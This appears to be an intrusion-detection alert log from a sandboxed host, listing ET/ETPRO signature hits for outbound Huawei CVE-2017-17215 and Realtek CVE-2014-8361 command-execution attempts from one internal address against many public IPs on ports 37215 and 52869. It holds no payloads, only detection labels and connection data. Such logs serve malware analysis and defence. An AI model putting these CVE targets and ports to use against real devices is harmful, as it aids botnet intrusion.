                                      07/20/24-23:01:40.286738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440437215192.168.2.2341.211.68.86
                                      07/20/24-23:01:53.503242TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4332652869192.168.2.2377.15.73.106
                                      07/20/24-23:01:31.974782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885037215192.168.2.23197.86.232.67
                                      07/20/24-23:01:47.443306TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614699452869192.168.2.23196.221.214.48
                                      07/20/24-23:01:55.694589TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4856252869192.168.2.23150.16.14.245
                                      07/20/24-23:01:56.880291TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24064652869192.168.2.23173.68.146.233
                                      07/20/24-23:01:44.340422TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613960052869192.168.2.23123.6.144.179
                                      07/20/24-23:01:45.159648TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4721252869192.168.2.2357.189.118.114
                                      07/20/24-23:01:45.182071TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24150652869192.168.2.2343.128.21.230
                                      07/20/24-23:01:08.559170TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25199252869192.168.2.23114.57.93.253
                                      07/20/24-23:01:04.094795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680437215192.168.2.23157.148.30.140
                                      07/20/24-23:01:31.978141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147837215192.168.2.23197.253.132.236
                                      07/20/24-23:01:43.994464TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614392452869192.168.2.232.84.107.116
                                      07/20/24-23:01:26.037548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5234452869192.168.2.2345.38.7.5
                                      07/20/24-23:01:20.110861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803437215192.168.2.23157.180.152.242
                                      07/20/24-23:01:59.745622TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615512252869192.168.2.23154.17.239.28
                                      07/20/24-23:01:20.113254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547037215192.168.2.2377.62.120.208
                                      07/20/24-23:01:47.243820TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3855052869192.168.2.2387.132.55.249
                                      07/20/24-23:01:41.722161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5182452869192.168.2.2314.249.111.18
                                      07/20/24-23:01:03.942398TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613413652869192.168.2.2365.114.239.111
                                      07/20/24-23:01:48.765940TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24211852869192.168.2.23174.126.153.78
                                      07/20/24-23:02:08.084136TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614651852869192.168.2.23161.96.78.14
                                      07/20/24-23:01:11.630627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5048437215192.168.2.23157.230.27.28
                                      07/20/24-23:01:34.050313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656637215192.168.2.23197.108.65.14
                                      07/20/24-23:01:42.749469TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24545652869192.168.2.23184.103.85.217
                                      07/20/24-23:01:34.044717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3421237215192.168.2.23197.171.121.26
                                      07/20/24-23:01:02.486908TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613732852869192.168.2.2325.108.103.192
                                      07/20/24-23:01:48.932731TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25402652869192.168.2.2397.241.192.98
                                      07/20/24-23:01:57.949070TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25740052869192.168.2.2379.25.231.52
                                      07/20/24-23:01:55.384732TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5148252869192.168.2.23178.69.5.63
                                      07/20/24-23:01:00.634165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5855637215192.168.2.23197.75.123.93
                                      07/20/24-23:01:45.063335TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4096252869192.168.2.23208.111.2.186
                                      07/20/24-23:01:42.142802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4661652869192.168.2.23209.170.78.160
                                      07/20/24-23:01:49.563475TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25224852869192.168.2.2374.211.16.76
                                      07/20/24-23:01:42.522141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5730852869192.168.2.2354.188.109.169
                                      07/20/24-23:01:20.596401TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24595652869192.168.2.23178.124.248.177
                                      07/20/24-23:01:46.025818TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24445852869192.168.2.2384.203.232.104
                                      07/20/24-23:01:58.067320TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5201252869192.168.2.23161.244.156.106
                                      07/20/24-23:01:13.826513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5126452869192.168.2.239.70.14.160
                                      07/20/24-23:00:59.213564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4455237215192.168.2.2341.216.133.169
                                      07/20/24-23:01:54.345402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3906652869192.168.2.23221.77.89.150
                                      07/20/24-23:01:20.132511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146237215192.168.2.23197.55.179.247
                                      07/20/24-23:01:46.054775TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5073852869192.168.2.23192.178.20.121
                                      07/20/24-23:02:15.054105TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25649252869192.168.2.23153.55.136.220
                                      07/20/24-23:01:08.611773TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25447452869192.168.2.2391.233.41.28
                                      07/20/24-23:01:01.404325TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615497652869192.168.2.23151.5.114.8
                                      07/20/24-23:01:44.416791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4797252869192.168.2.23167.144.253.27
                                      07/20/24-23:01:08.623583TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23550252869192.168.2.23111.160.194.136
                                      07/20/24-23:01:44.636234TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615063652869192.168.2.2331.246.229.175
                                      07/20/24-23:01:51.021834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5230852869192.168.2.23132.12.76.39
                                      07/20/24-23:01:45.926465TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23385452869192.168.2.23220.112.19.15
                                      07/20/24-23:01:46.312083TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25736452869192.168.2.23170.47.68.177
                                      07/20/24-23:02:06.738802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5932852869192.168.2.2312.160.102.240
                                      07/20/24-23:01:50.001370TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3689652869192.168.2.2396.24.157.5
                                      07/20/24-23:01:11.634372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738237215192.168.2.23157.37.216.246
                                      07/20/24-23:01:31.313383TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5367052869192.168.2.23220.0.122.40
                                      07/20/24-23:01:47.962852TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5964252869192.168.2.23137.109.251.204
                                      07/20/24-23:01:42.966322TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615538652869192.168.2.23118.209.219.113
                                      07/20/24-23:01:07.082045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921437215192.168.2.2334.4.8.9
                                      07/20/24-23:01:08.572790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3955252869192.168.2.23129.167.170.254
                                      07/20/24-23:01:47.644828TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24561052869192.168.2.2375.3.82.5
                                      07/20/24-23:01:57.787786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4308252869192.168.2.2395.253.23.104
                                      07/20/24-23:01:02.426129TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614847252869192.168.2.23203.236.42.147
                                      07/20/24-23:01:14.105908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015837215192.168.2.2341.59.235.147
                                      07/20/24-23:01:24.934977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3442637215192.168.2.23166.230.251.127
                                      07/20/24-23:01:51.086033TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615905052869192.168.2.23193.18.125.219
                                      07/20/24-23:01:08.581974TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23492652869192.168.2.2338.47.147.236
                                      07/20/24-23:01:45.202570TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5874452869192.168.2.23179.153.61.251
                                      07/20/24-23:01:44.894921TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5543252869192.168.2.23193.19.81.156
                                      07/20/24-23:01:47.201912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25742052869192.168.2.23187.119.209.224
                                      07/20/24-23:01:46.046177TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25273252869192.168.2.23202.170.123.220
                                      07/20/24-23:01:43.084243TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23428252869192.168.2.2343.122.229.51
                                      07/20/24-23:01:02.046626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5474837215192.168.2.2382.113.201.213
                                      07/20/24-23:01:31.977603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396637215192.168.2.23157.46.234.94
                                      07/20/24-23:01:41.381812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4128852869192.168.2.2318.194.44.24
                                      07/20/24-23:01:03.194002TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5293652869192.168.2.2386.74.227.91
                                      07/20/24-23:01:13.146648TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4123252869192.168.2.234.129.239.131
                                      07/20/24-23:01:06.957274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4078637215192.168.2.23157.246.19.232
                                      07/20/24-23:01:24.934684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650637215192.168.2.2341.195.231.185
                                      07/20/24-23:01:11.642449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519237215192.168.2.23157.196.130.183
                                      07/20/24-23:00:59.211046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762437215192.168.2.2341.245.116.58
                                      07/20/24-23:01:11.816101TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961037215192.168.2.2341.178.44.73
                                      07/20/24-23:01:41.549051TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614253652869192.168.2.238.243.36.237
                                      07/20/24-23:01:51.791706TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24993852869192.168.2.23142.206.118.182
                                      07/20/24-23:01:53.326732TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614868652869192.168.2.2337.84.136.136
                                      07/20/24-23:01:02.048367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658237215192.168.2.23157.238.18.41
                                      07/20/24-23:01:04.064240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442237215192.168.2.23157.131.49.54
                                      07/20/24-23:01:09.055028TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25464052869192.168.2.23207.223.182.162
                                      07/20/24-23:01:00.635367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943237215192.168.2.23157.146.94.28
                                      07/20/24-23:01:42.522141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3848252869192.168.2.2393.78.34.12
                                      07/20/24-23:01:14.090830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6064437215192.168.2.23157.45.181.132
                                      07/20/24-23:01:50.339110TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3521652869192.168.2.23125.185.15.217
                                      07/20/24-23:01:08.600679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4532852869192.168.2.23223.83.213.222
                                      07/20/24-23:01:49.040108TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5195452869192.168.2.23106.212.70.208
                                      07/20/24-23:01:21.943544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824437215192.168.2.23159.73.26.136
                                      07/20/24-23:01:43.450134TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5051252869192.168.2.23223.103.54.206
                                      07/20/24-23:02:13.454278TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615348652869192.168.2.23219.135.178.135
                                      07/20/24-23:01:55.076019TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23815252869192.168.2.23123.227.205.159
                                      07/20/24-23:01:41.417573TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4270052869192.168.2.23163.18.131.94
                                      07/20/24-23:01:21.954501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658837215192.168.2.23189.208.63.195
                                      07/20/24-23:01:08.667964TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23689852869192.168.2.2360.208.170.61
                                      07/20/24-23:01:06.973541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3666637215192.168.2.23197.26.127.58
                                      07/20/24-23:01:42.062724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5520052869192.168.2.23194.5.145.232
                                      07/20/24-23:01:26.131973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3957652869192.168.2.2324.238.134.176
                                      07/20/24-23:02:02.954311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5566652869192.168.2.23203.184.58.202
                                      07/20/24-23:01:42.425705TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613943052869192.168.2.23159.183.134.67
                                      07/20/24-23:01:42.883774TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615086652869192.168.2.23139.92.32.15
                                      07/20/24-23:01:45.148866TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23346852869192.168.2.23210.80.122.96
                                      07/20/24-23:01:14.105395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4128637215192.168.2.23197.216.251.19
                                      07/20/24-23:01:27.653586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5653637215192.168.2.23157.178.65.214
                                      07/20/24-23:01:43.906354TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25975052869192.168.2.23101.52.13.24
                                      07/20/24-23:00:57.221190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4265037215192.168.2.2347.7.162.229
                                      07/20/24-23:01:14.090830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3368037215192.168.2.23197.93.60.57
                                      07/20/24-23:01:41.370646TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615272652869192.168.2.2363.75.166.170
                                      07/20/24-23:01:44.411586TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23502252869192.168.2.2327.36.59.232
                                      07/20/24-23:01:56.400580TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25723852869192.168.2.23140.234.5.119
                                      07/20/24-23:01:46.808111TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4980652869192.168.2.2390.112.61.164
                                      07/20/24-23:01:42.761962TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3787452869192.168.2.23180.231.223.193
                                      07/20/24-23:01:47.443306TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25126052869192.168.2.2341.3.232.51
                                      07/20/24-23:00:59.203960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4954437215192.168.2.2341.37.144.8
                                      07/20/24-23:01:45.116897TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3835252869192.168.2.2343.216.241.103
                                      07/20/24-23:01:49.537827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5911052869192.168.2.23182.29.32.245
                                      07/20/24-23:02:28.464626TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5210052869192.168.2.2336.136.49.118
                                      07/20/24-23:01:51.056707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4231852869192.168.2.2361.237.192.205
                                      07/20/24-23:01:55.928013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4860852869192.168.2.2379.113.232.226
                                      07/20/24-23:01:41.416217TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614336052869192.168.2.2332.178.44.200
                                      07/20/24-23:01:43.177552TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614821252869192.168.2.2366.34.14.57
                                      07/20/24-23:01:44.036421TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4315652869192.168.2.2354.182.169.174
                                      07/20/24-23:01:03.936204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5072452869192.168.2.23184.77.18.239
                                      07/20/24-23:01:14.060998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5385837215192.168.2.23113.162.26.155
                                      07/20/24-23:01:27.677519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445237215192.168.2.23128.19.87.235
                                      07/20/24-23:01:46.019511TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23307252869192.168.2.23182.29.32.245
                                      07/20/24-23:01:00.647695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398437215192.168.2.2341.137.58.228
                                      07/20/24-23:01:40.321965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4248437215192.168.2.23157.226.115.171
                                      07/20/24-23:01:42.699478TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23569252869192.168.2.23158.36.226.221
                                      07/20/24-23:01:06.990535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794037215192.168.2.23157.64.21.239
                                      07/20/24-23:01:11.168553TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614924652869192.168.2.23123.52.107.77
                                      07/20/24-23:01:42.262354TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615593852869192.168.2.23111.229.109.170
                                      07/20/24-23:01:41.722161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5100652869192.168.2.23169.160.238.67
                                      07/20/24-23:00:59.153608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3302837215192.168.2.23197.218.184.30
                                      07/20/24-23:01:40.323034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3509837215192.168.2.23157.22.220.5
                                      07/20/24-23:02:00.725615TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25494252869192.168.2.23157.156.14.69
                                      07/20/24-23:01:43.209467TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614415452869192.168.2.2354.184.6.19
                                      07/20/24-23:01:41.322613TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3821852869192.168.2.2397.65.172.105
                                      07/20/24-23:01:00.635367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4590237215192.168.2.23197.209.84.96
                                      07/20/24-23:01:01.313651TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614125252869192.168.2.23188.92.250.125
                                      07/20/24-23:02:17.231770TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4778852869192.168.2.2384.123.73.220
                                      07/20/24-23:01:44.520254TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4839652869192.168.2.23190.100.221.147
                                      07/20/24-23:01:56.315740TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5086652869192.168.2.23162.250.126.53
                                      07/20/24-23:01:08.584507TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4167652869192.168.2.2397.69.175.230
                                      07/20/24-23:01:41.604763TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23895652869192.168.2.23114.149.101.121
                                      07/20/24-23:01:58.880225TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4875452869192.168.2.2349.65.211.106
                                      07/20/24-23:01:44.756264TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4998452869192.168.2.235.80.243.157
                                      07/20/24-23:01:08.650213TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25188852869192.168.2.23132.86.136.162
                                      07/20/24-23:01:43.890780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4817652869192.168.2.23139.2.152.124
                                      07/20/24-23:01:45.196200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5651252869192.168.2.2363.237.109.125
                                      07/20/24-23:01:20.161614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058037215192.168.2.23157.5.129.59
                                      07/20/24-23:01:31.314906TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24684452869192.168.2.23152.43.74.118
                                      07/20/24-23:01:53.085271TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614853052869192.168.2.23143.107.137.70
                                      07/20/24-23:01:03.143706TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3872852869192.168.2.2325.222.87.118
                                      07/20/24-23:01:20.600303TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24288852869192.168.2.23138.74.14.28
                                      07/20/24-23:02:08.084136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5729852869192.168.2.23180.20.148.220
                                      07/20/24-23:01:00.645186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226037215192.168.2.2341.112.123.1
                                      07/20/24-23:01:41.956473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4289652869192.168.2.23182.86.228.100
                                      07/20/24-23:02:14.728323TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4849052869192.168.2.23212.231.201.227
                                      07/20/24-23:01:31.331748TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25330452869192.168.2.2345.38.7.5
                                      07/20/24-23:01:00.637175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990637215192.168.2.23140.34.44.126
                                      07/20/24-23:01:27.653309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5172437215192.168.2.231.38.182.72
                                      07/20/24-23:01:42.670071TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613513252869192.168.2.23106.204.29.126
                                      07/20/24-23:01:44.446628TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25916052869192.168.2.2391.15.191.58
                                      07/20/24-23:00:59.153608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922637215192.168.2.2341.124.14.171
                                      07/20/24-23:01:02.048113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563237215192.168.2.23157.78.46.190
                                      07/20/24-23:01:53.354788TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23279452869192.168.2.2394.86.220.196
                                      07/20/24-23:01:43.013771TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614961452869192.168.2.23149.136.40.221
                                      07/20/24-23:01:27.660099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4186237215192.168.2.2341.83.208.105
                                      07/20/24-23:01:48.221889TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614178252869192.168.2.23110.158.170.123
                                      07/20/24-23:01:04.082384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259837215192.168.2.23157.189.59.211
                                      07/20/24-23:01:09.021221TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24716452869192.168.2.23221.226.241.204
                                      07/20/24-23:01:40.279669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5692837215192.168.2.23197.67.22.235
